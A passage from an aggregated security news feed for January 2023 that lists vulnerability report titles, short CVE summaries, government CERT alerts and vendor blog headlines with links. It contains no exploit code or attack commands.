The advanced solution ensures that all emergency callers can be located across network generations. MILPITAS, Calif. and LONDON, UK – January 26, 2023 – SS8 Networks, a trusted provider of lawful and location intelligence solutions worldwide, today announced that a leading European converged network provider with over 30 million mobile connections, has selected its LocationWise […] The post A Leading Network Operator in Europe Extends SS8’s Emergency Caller Location Solution to 5G appeared first on SS8.

https://www.ss8.com/a-leading-network-operator-in-europe-extends-ss8s-emergency-caller-location-solution-to-5g/
Beyond CWV: 11 More Performance Metrics to Monitor, Part 3 of 5
2023-01-26T14:00:00Z | 1674741600

Learn the differences between synthetic tests and real user monitoring, and discover 11 web performance metrics beyond the Core Web Vitals ? and how to use them.

https://www.akamai.com/blog/developers/beyond-cwv-more-performance-metrics-to-monitor-part-3-of-5
High Threat Security Alert (A23-01-14): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-01-26T04:00:00Z | 1674705600

Apple has released iOS 12.5.7, iOS 15.7.3, iOS 16.3, iPadOS 15.7.3 and iPadOS 16.3 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-01-15): Multiple Vulnerabilities in VMware vRealize Log Insight
2023-01-26T04:00:00Z | 1674705600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-16): Multiple Vulnerabilities in Google Chrome
2023-01-26T04:00:00Z | 1674705600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Siretta QUARTZ-GOLD m2m DELETE_FILE cmd OS command injection vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1638
Siretta QUARTZ-GOLD m2m DELETE_FILE cmd heap-based buffer overflow vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1639
Siretta QUARTZ-GOLD httpd delfile.cgi stack-based buffer overflow vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1605
Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1612
Siretta QUARTZ-GOLD httpd SNMP OS command injection vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1615
Siretta QUARTZ-GOLD httpd shell.cgi leftover debug code vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1610
Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1608
Siretta QUARTZ-GOLD httpd delfile.cgi directory traversal vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1606
Siretta QUARTZ-GOLD httpd downfile.cgi directory traversal vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1609
Siretta QUARTZ-GOLD m2m m2m_parse_router_config cmd OS command injection vulnerabilities
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1640
Siretta QUARTZ-GOLD DetranCLI command parsing stack-based buffer overflow vulnerabilities
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1613
FreshTomato httpd update.cgi directory traversal vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1642
Siretta QUARTZ-GOLD httpd delfile.cgi OS command injection vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1607
FreshTomato httpd logs/view.cgi OS command injection vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1641
Siretta QUARTZ-GOLD m2m DELETE_FILE cmd directory traversal vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1637
Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability
2023-01-26T00:00:00Z | 1674691200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1611
CVE-2023-24020
2023-01-26T00:00:00Z | 1674691200

CWE-307: Improper Restriction of Improper Authentication Attempts Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior could bypass the brute force protection, allowing multiple attempts to force a login.

https://claroty.com/team82/disclosure-dashboard/cve-2023-24020
CVE-2023-23582
2023-01-26T00:00:00Z | 1674691200

CWE-122: Heap-Based Buffer Overflow Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior are vulnerable to a heap-based buffer overflow, which could allow an attacker to execute arbitrary code or crash the device remotely.

https://claroty.com/team82/disclosure-dashboard/cve-2023-23582
CVE-2023-22389
2023-01-26T00:00:00Z | 1674691200

CWE-256: Plaintext Storage of a Password Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior store passwords in a plaintext file when the device configuration is exported via Save/Restore–>Backup Settings, which could be read by any user accessing the file.

https://claroty.com/team82/disclosure-dashboard/cve-2023-22389
CVE-2023-22315
2023-01-26T00:00:00Z | 1674691200

CWE-345: Insufficient Verification of Data Authenticity Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior use a proprietary local area network (LAN) protocol that does not verify updates to the device. An attacker could upload a malformed update file to the device and execute arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2023-22315
UK cyber experts warn of targeted phishing attacks from actors based in Russia and Iran
2023-01-25T15:01:56Z | 1674658916

Advisory highlights techniques used by attackers in spear-phishing campaigns.

https://www.ncsc.gov.uk/news/uk-cyber-experts-warn-of-targeted-phishing-attacks-from-actors-based-in-russia-and-iran
Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
2023-01-25T15:00:00Z | 1674658800

Akamai researchers have analyzed a critical vulnerability in Microsoft's CryptoAPI that would allow an attacker to masquerade as a legitimate entity.

https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi
Artemis – CERT Polska verifies the cybersecurity of Polish organizations
2023-01-25T07:00:00Z | 1674630000

The New Year has brought more solutions to improve the security of the Polish Internet. One of them is Artemis, a tool developed by the CERT Polska team and initiated by the KN Cyber science club of Warsaw University of Technology. Artemis was designed to look for websites misconfigurations and vulnerabilities on a mass scale. We use it to verify infrastructure of entities for which, according to the National Cyber Security System Act, incident handling is coordinated by CSIRT NASK.

https://cert.pl/en/posts/2023/01/artemis-scanning/
The National Cyber Security Centre Finland’s weekly review – 3/2023
2023-01-24T11:59:02Z | 1674561542

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 13–19 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-32023
The National Cyber Security Centre Finland’s weekly review – 3/2023
2023-01-24T11:59:02Z | 1674561542

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 13–19 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-32023
Gartner’s Market Guide to Single-Vendor SASE Offerings: The Closest Thing You’ll Get to a SASE Magic Quadrant
2023-01-24T09:38:13Z | 1674553093

Ever since Secure Access Service Edge (SASE) was adopted by every significant networking provider and network security vendor, IT leaders have been waiting for a Gartner SASE Magic Quadrant. And for good reason. The industry has seen widely different approaches to what’s being marketed as SASE. Some companies partnered with each other to offer a... The post Gartner’s Market Guide to Single-Vendor SASE Offerings: The Closest Thing You’ll Get to a SASE Magic Quadrant appeared first on Cato Networks.

https://www.catonetworks.com/blog/gartners-market-guide-to-single-vendor-sase-offerings-the-closest-thing-youll-get-to-a-sase-magic-quadrant/
IronNet 2022-Q4 threat intelligence report
2023-01-23T19:28:30Z | 1674502110

In our Q4 Threat Intelligence Report, IronNet analysts provide insight into cyber threat trends from October through December 2022. The report draws from telemetry provided by the IronNet Collective Defense ℠ platform, including our network detection and response (NDR) solution IronDefense, communities in IronDome, and proactive threat intelligence feed IronRadar. Combining these insights with in-depth assessments by IronNet threat analysts, our Q4 report includes: A breakdown of command-and-control (C2) trends, including analyses of top detected malware families, top countries hosting C2s, and trends seen across domain registrars, as tracked by IronRadar. Details into key IronNet observations during Q4, such as insights into the growing popularity of the Sliver C2 framework, threat actor tactics to bypass traditional C2 detection mechanisms, and IronDome detections of malware activity in the Middle East. In-depth assessments of Big 4 nation-state activity, detailing major attack trends by state-sponsored threat actors in Q4 and nation-state strategic objectives in cyber.

https://www.ironnet.com/resource-library/ironnet-2022-q4-threat-intelligence-report
Trendid ja tähelepanekud küberruumis – IV kvartal 2022
2023-01-23T14:56:19Z | 1674485779

RIA kvartaliülevaade võtab kokku viimase kolme kuu tähtsamad kübersündmused Eestis ja maailmas.

https://ria.ee/uudised/trendid-ja-tahelepanekud-kuberruumis-iv-kvartal-2022
Lapsesaamisega seotud info on koondatud teekaardile Eesti.ee lehel
2023-01-23T10:00:50Z | 1674468050

Äsja valminud infoteenus koondab kokku lapsesaamisega seotud olulise info riigi teenustest ja toetustest lapsevanemateks saajatele.

https://ria.ee/uudised/lapsesaamisega-seotud-info-koondatud-teekaardile-eestiee-lehel
SASE vs. the Upside Down World of Networking and Security
2023-01-22T13:37:03Z | 1674394623

The post SASE vs. the Upside Down World of Networking and Security appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-vs-the-upside-down-world-of-networking-and-security/
Security Alert (A23-01-13): Multiple Vulnerabilities in Microsoft Edge
2023-01-20T04:00:00Z | 1674187200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
SMA1000 Pre-Auth Improper Limitation of a Pathname to a Restricted Directory
2023-01-19T17:47:31Z | 1674150451

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.IMPORTANT: SMA 100 series products are not affected by this vulnerability. CVE: CVE-2023-0126 Last updated: Jan. 19, 2023, 5:47 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001
SEO Need-to-Knows: Google?s Core Web Vitals, Part 2 of 5
2023-01-19T14:00:00Z | 1674136800

Learn about Google's Core Web Vitals ? LCP, FID, and CLS ? and how improving them can enhance your users? experience and SEO ranking.

https://www.akamai.com/blog/developers/seo-google-core-web-vitals-part-2-of-5
Harnessing the eBPF Verifier
2023-01-19T13:00:42Z | 1674133242

During my internship at Trail of Bits, I prototyped a harness that improves the testability of the eBPF verifier, simplifying the testing of eBPF programs. My eBPF harness runs in user space, independently of any locally running kernel, and thus opens the door to testing of eBPF programs across different kernel versions. […]

https://blog.trailofbits.com/2023/01/19/ebpf-verifier-harness/
December cyber weather mainly rainy despite occasional positive news
2023-01-19T08:11:10Z | 1674115870

The year 2022 ended with rainy cyber weather. The performance of communications networks remained good in December, but the number of denial-of-service attacks increased significantly. There was an even flow of reports about hijacked social media accounts, which serves as a reminder about how important it is to protect your accounts. Continuity in the maintenance of medical devices is important for information security and ethical reasons.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_12/2022
December cyber weather mainly rainy despite occasional positive news
2023-01-19T08:11:10Z | 1674115870

The year 2022 ended with rainy cyber weather. The performance of communications networks remained good in December, but the number of denial-of-service attacks increased significantly. There was an even flow of reports about hijacked social media accounts, which serves as a reminder about how important it is to protect your accounts. Continuity in the maintenance of medical devices is important for information security and ethical reasons.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_12/2022
Security Alert (A23-01-11): Multiple Vulnerabilities in Cisco Products
2023-01-19T04:00:00Z | 1674100800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-12): Vulnerability in Drupal
2023-01-19T04:00:00Z | 1674100800

Drupal has released a security advisory to address a vulnerability in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Ghost Foundation Ghost Post Creation insecure default installation vulnerability
2023-01-19T00:00:00Z | 1674086400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1686
Remote Access VPNs are a Short-Term Solution
2023-01-18T15:38:13Z | 1674056293

The face of the modern corporate network is changing rapidly. Digital transformation initiatives, cloud adoption, remote work, and other factors all have a significant impact on where corporate IT assets are located and how corporate networks are used. Companies looking to provide secure remote access to their off-site employees have largely chosen to expand their... The post Remote Access VPNs are a Short-Term Solution appeared first on Cato Networks.

https://www.catonetworks.com/blog/remote-access-vpns-are-a-short-term-solution/
Ukraine cyber defenders in UK for high-level talks
2023-01-18T15:09:03Z | 1674054543

Members of the national Computer Emergency Response Team for Ukraine (CERT-UA) held bilateral talks to discuss the conflict and resilience building.

https://www.ncsc.gov.uk/news/ukraine-cyber-defenders-in-uk-for-high-level-talks
The National Cyber Security Centre Finland’s weekly review – 2/2023
2023-01-18T14:18:31Z | 1674051511

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 6–12 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-22023
The National Cyber Security Centre Finland’s weekly review – 2/2023
2023-01-18T14:18:31Z | 1674051511

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 6–12 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-22023
What?s New for Developers: 2022 Recap
2023-01-18T14:00:00Z | 1674050400

Read the year-end review of developer highlights for 2022.

https://www.akamai.com/blog/developers/whats-new-for-developers-2022-recap
Riik kutsub testima Eesti riiklikku mobiilirakendust
2023-01-18T13:46:15Z | 1674049575

Eesti valmistub selle aasta keskpaigas avalikustama riikliku mobiilirakenduse mRiik, mis toob avalikud teenused kasutajale mobiiltelefoni. Alates veebruarist on kõigil võimalik mRiigi arendusse panustada ja registreerida end rakenduse testijaks.

https://ria.ee/uudised/riik-kutsub-testima-eesti-riiklikku-mobiilirakendust
Security Alert (A23-01-08): Multiple Vulnerabilities in Firefox
2023-01-18T04:00:00Z | 1674014400

Mozilla has published the advisories (MFSA2023-01 and MFSA2023-02) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-09): Multiple Vulnerabilities in Apache HTTP Server
2023-01-18T04:00:00Z | 1674014400

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-10): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2023)
2023-01-18T04:00:00Z | 1674014400

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Mitsubishi Electric Corporation MELSEC iQ-FX5U webserver session identifier generation authentication bypass vulnerability
2023-01-18T00:00:00Z | 1674000000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1646
FIRST POST: January - March 2023
2023-01-18T00:00:00Z | 1674000000

Upcoming Events - Bilbao, Kigali, Amsterdam; TF-CSIRT Meeting & 2023 FIRST Regional Symposium Europe; 2023 FIRST & AfricaCERT Symposium: Africa and Arab Regions; Date for your Diaries - Amsterdam 2023 FIRST Technical Colloquium, April 17-19; Chair Sherif Hashem and Board Member Michael Hausding participate in the FIRST & ITU-ARCC Regional Symposium for Africa and Arab Regions; First 100 days on the FIRST board; Are you interested in becoming a future board member?; Be a FIRST trainer! David Rüfenacht, Senior Threat Intelligence Analyst, provides a first-hand account; Special Interest Groups Update; Messaging Malware and Mobile Anti-Abuse Working Group (M3AAWG) and Forum of Incident Response and Security Teams (FIRST) Join Forces to Address Global Internet and Security Issues; Twenty More Members Join FIRST;

https://www.first.org/newsroom/newsletters/FIRST_POST_Jan_Mar_2023.pdf
Resource Limit Increases for EdgeWorkers Yield Big Results
2023-01-17T14:00:00Z | 1673964000

Read about how EdgeWorkers reduced errors resulting from resource limit constraints ? unlocking even more opportunities for businesses

https://www.akamai.com/blog/developers/resource-limit-increases-for-edgeworkers-yield-big-results
Introducing RPC Investigator
2023-01-17T13:00:06Z | 1673960406

A new tool for Windows RPC research. Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer […]

https://blog.trailofbits.com/2023/01/17/rpc-investigator-microsoft-windows-remote-procedure-call/
CVE-2022-46732
2023-01-17T00:00:00Z | 1673913600

CWE-288: Authentication bypass using an alternate path or channel Even if the authentication fails for local service authentication, the requested command could still execute regardless of authentication status. Read more: Hacking ICS Historians: The Pivot Point from IT to OT

https://claroty.com/team82/disclosure-dashboard/cve-2022-46732
CVE-2022-46660
2023-01-17T00:00:00Z | 1673913600

CWE-434: Unrestricted upload of file with dangerous type An unauthorized user could alter or write files with full control over the path and content of the file. Read more: Hacking ICS Historians: The Pivot Point from IT to OT

https://claroty.com/team82/disclosure-dashboard/cve-2022-46660
CVE-2022-46331
2023-01-17T00:00:00Z | 1673913600

CWE-284 Improper access control An unauthorized user could possibly delete any file on the system. Read more: Hacking ICS Historians: The Pivot Point from IT to OT

https://claroty.com/team82/disclosure-dashboard/cve-2022-46331
CVE-2022-43494
2023-01-17T00:00:00Z | 1673913600

CWE-284 Improper access control An unauthorized user could be able to read any file on the system, potentially exposing sensitive information. Read more: Hacking ICS Historians: The Pivot Point from IT to OT

https://claroty.com/team82/disclosure-dashboard/cve-2022-43494
CVE-2022-38469
2023-01-17T00:00:00Z | 1673913600

CWE-261 Weak encoding for password An unauthorized user with network access and the decryption key could decrypt sensitive data, such as usernames and passwords. Read more: Hacking ICS Historians: The Pivot Point from IT to OT

https://claroty.com/team82/disclosure-dashboard/cve-2022-38469
Recomendações da OCDE relevantes para a cibersegurança
2023-01-16T00:00:00Z | 1673827200

Na Reunião Ministerial sobre Economia Digital, a 14 de dezembro de 2022, foram lançadas as seguintes recomendações adotadas no Conselho de Ministros da OCDE relevantes para a área da cibersegurança:  Recommendation of the Council on Digital Security Risk Management Recommendation of the Council on National Digital Security Strategies Recommendation of the Council on the Digital Security of Products and Services Recommendation of the Council on the Treatment of Digital Security Vulnerabilities Estas recomendações visam orientar os Estados Membros da OCDE na implementação de políticas públicas e práticas em áreas tão importantes como a gestão do risco, definição e implementação de estratégias nacionais, na segurança de produtos e no tratamento de vulnerabilidades.

https://dyn.cncs.gov.pt/pt/detalhe/art/135746/recomendacoes-da-ocde-relevantes-para-a-ciberseguranca
NCSC statement on the Royal Mail incident
2023-01-13T15:36:44Z | 1673624204

An NCSC statement following the incident affecting the Royal Mail.

https://www.ncsc.gov.uk/news/royal-mail-incident
Announcing a stable release of sigstore-python
2023-01-13T15:00:58Z | 1673622058

Read the official announcement on the Sigstore blog as well! Trail of Bits is thrilled to announce the first stable release of sigstore-python, a client implementation of Sigstore that we’ve been developing for nearly a year! This work has been graciously funded by Google’s Open Source Security Team (GOSST), who we’ve also […]

https://blog.trailofbits.com/2023/01/13/sigstore-python/
Improving Popularity Rankings for Better Threat Intelligence, Part 1
2023-01-13T14:00:00Z | 1673618400

AkaRank can overcome biases in current domain popularity lists and help ensure the best threat coverage and user experience.

https://www.akamai.com/blog/security/improving-popularity-rankings-for-better-threat-intelligence-part-1
Akamai?s Perspective on January?s Patch Tuesday 2023
2023-01-13T06:00:00Z | 1673589600

Every Patch Tuesday stirs up the community. See Akamai's insights and recommendations on what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-january-2023
Security Alert (A23-01-07): Multiple Vulnerabilities in Microsoft Edge
2023-01-13T04:00:00Z | 1673582400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Flashpoint in 2023: A Note From Our CEO
2023-01-12T14:57:00Z | 1673535420

Flashpoint CEO Josh Lefkowitz on the steps Flashpoint will be taking to improve, innovate, and inspire in 2023. The post Flashpoint in 2023: A Note From Our CEO appeared first on Flashpoint.

https://flashpoint.io/blog/flashpoint-2023-ceo-josh-lefkowitz/
What Challenges Will 2023 Bring for Cyber?
2023-01-12T14:00:00Z | 1673532000

In 2023, the tech industry must address workforce diversity, manage cyber risks and regulations, and understand how innovation can challenge cyber resiliency.

https://www.akamai.com/blog/security/what-challenges-will-2023-bring-for-cyber
Keeping the wolves out of wolfSSL
2023-01-12T13:00:17Z | 1673528417

Trail of Bits is publicly disclosing four vulnerabilities that affect wolfSSL: CVE-2022-38152, CVE-2022-38153, CVE-2022-39173, and CVE-2022-42905. The four issues, which have CVSS scores ranging from medium to critical, can all result in a denial of service (DoS). These vulnerabilities have been discovered automatically using the novel protocol fuzzer tlspuffin. This blog post […]

https://blog.trailofbits.com/2023/01/12/wolfssl-vulnerabilities-tlspuffin-fuzzing-ssh/
High Threat Security Alert (A23-01-06): Multiple Vulnerabilities in Cisco Products
2023-01-12T04:00:00Z | 1673496000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Qt Project Qt QML QtScript Javascript spreading buffer overflow vulnerability
2023-01-12T00:00:00Z | 1673481600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1650
Qt Project Qt QML QtScript Reflect API integer overflow vulnerability
2023-01-12T00:00:00Z | 1673481600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1617
The National Cyber Security Centre Finland’s weekly review – 1/2023
2023-01-11T14:07:39Z | 1673446059

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 30 December 2022–5 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-12023
The National Cyber Security Centre Finland’s weekly review – 1/2023
2023-01-11T14:07:39Z | 1673446059

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 30 December 2022–5 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-12023
5 Things SASE Covers that SD-WAN Doesn’t. A Practical Webinar
2023-01-11T10:14:21Z | 1673432061

The post 5 Things SASE Covers that SD-WAN Doesn’t. A Practical Webinar appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-5-things-sase-covers-that-sdwan-doesnt
High Threat Security Alert (A23-01-03): Multiple Vulnerabilities in Microsoft Products (January 2023)
2023-01-11T04:00:00Z | 1673409600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-04): Multiple Vulnerabilities in Google Chrome
2023-01-11T04:00:00Z | 1673409600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-05): Multiple Vulnerabilities in Adobe Reader/Acrobat
2023-01-11T04:00:00Z | 1673409600

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
You’ll Need Zero Trust, But You Won’t Get It with a VPN
2023-01-10T15:00:00Z | 1673362800

Properly implemented, a zero trust architecture provides much more granular and effective security than legacy security models. However, this is only true if a zero trust initiative is supported with the right tools. Legacy solutions, such as virtual private networks (VPNs), lack the capabilities necessary to implement a zero trust security strategy. Zero Trust Security... The post You’ll Need Zero Trust, But You Won’t Get It with a VPN appeared first on Cato Networks.

https://www.catonetworks.com/blog/youll-need-zero-trust-but-you-wont-get-it-with-a-vpn/
3 Ransomware Questions Every Security Leader Should Be Able to Answer
2023-01-10T14:00:00Z | 1673359200

Read about how organizations need microsegmentation to identify and remediate ransomware attacks, and the ransomware questions they need to answer.

https://www.akamai.com/blog/security/ransomware-questions-organizations-need-to-answer
Another prolific year of open-source contributions
2023-01-10T13:00:32Z | 1673355632

This time last year, we wrote about the more than 190 Trail of Bits-authored pull requests that were merged into non-Trail of Bits repositories in 2021. In 2022, we continued that trend by having more than 400 pull requests merged into non-Trail of Bits repositories! Why is this significant? While we take […]

https://blog.trailofbits.com/2023/01/10/open-source-contributions-2022/
Using MSPs to administer your cloud services
2023-01-10T11:24:25Z | 1673349865

Andrew A explains what you must check before giving Managed Service Providers (MSPs) the keys to your kingdom.

https://www.ncsc.gov.uk/blog-post/using-msps-to-administer-your-cloud-services
Asus RT-AX82U cfg_server cm_processConnDiagPktList denial of service vulnerability
2023-01-10T00:00:00Z | 1673308800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1592
Asus RT-AX82U cfg_server cm_processREQ_NC information disclosure vulnerability
2023-01-10T00:00:00Z | 1673308800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1590
Asus RT-AX82U get_IFTTTTtoken.cgi authentication bypass vulnerability
2023-01-10T00:00:00Z | 1673308800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1586
Olukord küberruumis – detsember 2022
2023-01-08T20:47:56Z | 1673210876

Detsembris registreerisime 233 mõjuga intsidenti, mis on viimase poole aasta keskmisest veidi madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-detsember-2022
Secure Access Service Edge (SASE) Ecosystem Futuriom Report
2023-01-05T14:34:49Z | 1672929289

The post Secure Access Service Edge (SASE) Ecosystem Futuriom Report appeared first on Cato Networks.

https://www.catonetworks.com/resources/secure-access-service-edge-sase-ecosystem-futuriom-report/
Building an Effective Bot Management Strategy
2023-01-04T14:00:00Z | 1672840800

Effectively managing bot traffic requires a combination of strong detection and response strategies. Here, we explore Akamai?s methods for implementing both.

https://www.akamai.com/blog/security/building-an-effective-bot-management-strategy
Top 10 web hacking techniques of 2022 - nominations open
2023-01-04T13:52:52Z | 1672840372

Update: Voting is now closed, and the panel vote is in progress.  Nominations are now open for the top 10 new web hacking techniques of 2022! Every year, security researchers share their latest f

https://portswigger.net/research/top-10-web-hacking-techniques-of-2022-nominations-open
Security Alert (A23-01-01): Multiple Vulnerabilities in Android
2023-01-04T04:00:00Z | 1672804800

Google has released Android Security Bulletin January 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-01-02): Multiple Vulnerabilities in Fortinet Products
2023-01-04T04:00:00Z | 1672804800

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Fidelis Security Platforms Added to the DoD ESI Portfolio
2023-01-03T20:01:56Z | 1672776116

BETHESDA, Md.–(BusinessWire)–Fidelis Security (Formerly Known as Fidelis Cybersecurity), a portfolio company of Skyview Capital, today announced its platforms have been added to the Department of Defense (DoD) Enterprise Software Initiative (ESI) program as part of Carahsoft Technology Corp.’s most recent award. This will make it easier and faster for the U.S. Department of Defense and U.S. […] The post Fidelis Security Platforms Added to the DoD ESI Portfolio appeared first on Fidelis Security.

https://fidelissecurity.com/press/fidelis-security-platforms-added-to-the-dod-esi-portfolio/
4 Ways Where Remote Access VPNs Fall Short
2023-01-03T15:46:45Z | 1672760805

Secure remote access is a common need for the modern enterprise. While employees almost exclusively worked from the office in the past, this has changed in recent years. The pandemic and the globalization of the workforce means that organizations may have users connecting and working from all over the world, and these remote users need... The post 4 Ways Where Remote Access VPNs Fall Short appeared first on Cato Networks.

https://www.catonetworks.com/blog/4-ways-where-remote-access-vpns-fall-short/
The National Cyber Security Centre Finland’s weekly review – 52/2022
2023-01-03T14:12:17Z | 1672755137

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 23–29 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-522022
The National Cyber Security Centre Finland’s weekly review – 52/2022
2023-01-03T14:12:17Z | 1672755137

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 23–29 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-522022
Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
2023-01-03T00:00:00Z | 1672704000

While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn't resist poking at the scooter's mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

https://samcurry.net/web-hackers-vs-the-auto-industry
SASE In Manufacturing. What CIOs/CISOs Need to Know
2023-01-02T15:27:03Z | 1672673223

The post SASE In Manufacturing. What CIOs/CISOs Need to Know appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-sase-value-and-promise-in-manufacturing
A 4ª edição do Relatório Sociedade do Observatório de Cibersegurança foi publicada
2022-12-29T00:00:00Z | 1672272000

